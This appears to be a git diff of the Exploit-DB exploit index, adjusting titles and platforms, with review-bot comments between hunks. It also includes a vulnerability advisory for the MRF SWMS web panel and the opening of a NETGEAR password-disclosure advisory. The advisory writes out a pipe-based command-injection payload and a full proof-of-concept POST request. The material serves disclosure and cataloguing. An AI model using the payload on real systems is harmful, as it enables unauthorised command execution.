16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
|
||||
16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16743,platforms/win_x86/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
|
||||
16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203
|
||||
16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202
|
||||
16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093
|
||||
|
@ -10904,16 +10905,16 @@ id,file,description,date,author,platform,type,port
|
|||
16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0
|
||||
16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
|
||||
16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0
|
||||
16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
|
||||
16777,platforms/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
|
||||
16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881
|
||||
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
|
||||
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
|
||||
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
|
||||
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
|
||||
16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0
|
||||
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
|
||||
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
|
||||
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
|
||||
16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144
|
||||
16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144
|
||||
16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
|
||||
16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080
|
||||
16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
|
||||
|
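Review bot: This hunk mixes two kinds of change: 16777 gets a version added to its title ("2.5 Build 758"), while 16782 and 16786 are re-platformed to `win_x86`. Row 16782, "Apache (Windows x86) - Chunked Encoding", still has no affected version in the title even though the line is being touched; add it here so the entry is usable for version matching. It would also help to note in the commit message that the context row 16783 was already under `win_x86` without a "(Windows x86)" tag in its title, since the tagging rule is otherwise hard to infer.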
@ -10950,7 +10951,7 @@ id,file,description,date,author,platform,type,port
|
|||
16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25
|
||||
16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389
|
||||
16824,platforms/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389
|
||||
16825,platforms/windows/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16825,platforms/win_x86/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
|
||||
16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292
|
||||
16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
|
@ -10982,8 +10983,8 @@ id,file,description,date,author,platform,type,port
|
|||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
|
||||
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
|
||||
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
|
||||
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
|
||||
16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0
|
||||
16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0
|
||||
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
|
||||
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
|
||||
16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
|
||||
|
@ -11002,7 +11003,7 @@ id,file,description,date,author,platform,type,port
|
|||
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
|
||||
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
|
||||
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
|
||||
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
|
||||
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
|
||||
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
|
||||
|
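Review bot: Row 16880 is corrected from `linux` to `bsd_x86` because its title says "(*BSD x86)", but the context row 16878, "ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow", is left under platforms/linux with platform `linux`. The same mislabel is being fixed one row away, and `freebsd` is already a valid platform (row 16879 uses it), so 16878 should be moved in this change too.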
@ -12360,7 +12361,7 @@ id,file,description,date,author,platform,type,port
|
|||
21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0
|
||||
21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0
|
||||
21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0
|
||||
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
|
||||
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
|
||||
21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0
|
||||
21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0
|
||||
21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0
|
||||
|
@ -13433,7 +13434,7 @@ id,file,description,date,author,platform,type,port
|
|||
26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
|
||||
26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
|
||||
40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161
|
||||
26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
|
||||
26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0
|
||||
26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
|
||||
26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0
|
||||
26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0
|
||||
|
@ -13850,7 +13851,7 @@ id,file,description,date,author,platform,type,port
|
|||
32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
|
||||
33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
|
||||
32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
|
||||
32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0
|
||||
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
|
||||
30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
|
||||
30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
|
||||
30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
|
||||
|
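Review bot: In the row for 32277 the new platform is `lin_x86-64`, which mixes an underscore and a hyphen and does not follow the `lin_x86` / `win_x86` shape used elsewhere in this change, while the title keeps "(x64)". Anything that splits platform names on `-` or `_`, or searches for "x64", will treat these as different tokens. Suggest one spelling for the 64-bit architecture across the platform column and the titles, and listing the allowed platform values in the repository documentation.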
@ -20650,7 +20651,7 @@ id,file,description,date,author,platform,type,port
|
|||
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
|
||||
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
|
||||
7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
|
||||
|
@ -26907,9 +26908,9 @@ id,file,description,date,author,platform,type,port
|
|||
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
|
||||
24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0
|
||||
24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0
|
||||
24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0
|
||||
24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0
|
||||
24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0
|
||||
|
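Review bot: Besides the JAWS to Jaws casing change, the titles for 24255 and 24257 lose the affected file: "'index.php' gadget Parameter" becomes "'gadget' Parameter" and "'index.php' action Parameter" becomes "'action' Parameter". The script name is what defenders grep for in web server logs and WAF rules, so dropping it reduces the usefulness of the title; keep it, for example as "'index.php' 'gadget' Parameter". The context row 24252 ("fastream netfile ftp/web server") is still all lower case if casing is being normalised in this block.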
@ -26950,7 +26951,7 @@ id,file,description,date,author,platform,type,port
|
|||
24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0
|
||||
24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0
|
||||
24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0
|
||||
24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
|
||||
24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
|
||||
24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0
|
||||
24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0
|
||||
24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0
|
||||
|
@ -27757,7 +27758,7 @@ id,file,description,date,author,platform,type,port
|
|||
25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
|
||||
25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
|
||||
25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
|
||||
25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
|
||||
25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
|
||||
25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0
|
||||
25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
|
||||
25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
|
||||
|
@ -27936,7 +27937,7 @@ id,file,description,date,author,platform,type,port
|
|||
25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0
|
||||
25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0
|
||||
25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
|
||||
25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
|
||||
25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
|
||||
25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0
|
||||
25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
|
||||
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0
|
||||
|
@ -33846,7 +33847,7 @@ id,file,description,date,author,platform,type,port
|
|||
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
|
||||
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps,0
|
||||
34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0
|
||||
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
|
||||
34933,platforms/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
|
||||
34934,platforms/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0
|
||||
34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0
|
||||
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
|
||||
|
@ -37133,6 +37134,9 @@ id,file,description,date,author,platform,type,port
|
|||
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
|
||||
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
|
||||
41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0
|
||||
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41204,platforms/php/webapps/41204.txt,"Video Sharing Script 4.94 - 'uid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0
|
||||
|
|
|
|
@ -12,48 +12,43 @@ Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
|
|||
|
||||
-----------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
|
||||
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
|
||||
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
|
||||
attacks.
|
||||
|
||||
Affected parameter: MSM_MACRO_NAME (POST parameter)
|
||||
Affected file: ms.cgi (/swms/ms.cgi)
|
||||
Verified Affected Operation: Show Fatal Error and Log Package Configuration
|
||||
> Affected parameter: MSM_MACRO_NAME (POST parameter)
|
||||
> Affected file: ms.cgi (/swms/ms.cgi)
|
||||
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
|
||||
|
||||
It is possible to use the pipe character (|) to inject arbitrary OS commands
|
||||
and retrieve the output in the application's responses.
|
||||
and retrieve the output in the application's responses:
|
||||
|
||||
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
|
||||
|
||||
|
||||
Proof Of Concept:
|
||||
|
||||
The attacker can login to the web panel as a standard user (non-administrator account)
|
||||
and inject the POST parameter: MSM_MACRO_NAME with the following
|
||||
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
|
||||
As a result the attacker receives the result of the command in the application response
|
||||
|
||||
In order to reproduce the vulnerability:
|
||||
|
||||
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
|
||||
https://vulnsite.com/swms
|
||||
|
||||
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
|
||||
and send the following POST request in order to retrieve the output of the 'pwd' command:
|
||||
1. Login to the vulnerable MRF web panel (with a standard user account):
|
||||
https://<vulnerable>/swms
|
||||
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
|
||||
3. Modify and send the following POST request:
|
||||
|
||||
POST /swms/ms.cgi HTTP/1.1
|
||||
Host: vulnhost
|
||||
Host: <vulnerable>
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
|
||||
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 213
|
||||
|
||||
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
|
||||
|
||||
3. You can see the output of the command 'pwd' in the server response:
|
||||
4. Check the output of the injected command 'pwd' in the response:
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 21 Jul 2016 08:18:43 GMT
|
||||
|
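Review bot: the Referer line of the sample request carries the session identifier in the URL query string (MSM_SID=<session_id>), and the switch to the <vulnerable> placeholder keeps that without comment. Session identifiers in URLs end up in proxy logs, browser history and Referer headers, so the advisory should either name this as an additional weakness of the panel or tell readers to redact the identifier before sharing a captured request.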
@ -75,4 +70,4 @@ as a platform for attacks against other systems.
|
|||
|
||||
Disclaimer:
|
||||
|
||||
The responsible disclosure policy has been followed
|
||||
The responsible disclosure policy has been followed
|
358
platforms/hardware/webapps/41205.py
Executable file
|
@ -0,0 +1,358 @@
|
|||
Trustwave SpiderLabs Security Advisory TWSL2017-003:
|
||||
Multiple Vulnerabilities in NETGEAR Routers
|
||||
|
||||
Published: 01/30/2017
|
||||
Version: 1.0
|
||||
|
||||
Vendor: NETGEAR (http://www.netgear.com/)
|
||||
Product: Multiple products
|
||||
|
||||
Finding 1: Remote and Local Password Disclosure
|
||||
Credit: Simon Kenin of Trustwave SpiderLabs
|
||||
CVE: CVE-2017-5521
|
||||
|
||||
Version affected:
|
||||
|
||||
# AC1450 V1.0.0.34_10.0.16 (Latest)
|
||||
# AC1450 V1.0.0.22_1.0.10
|
||||
# AC1450 V1.0.0.14_1.0.6
|
||||
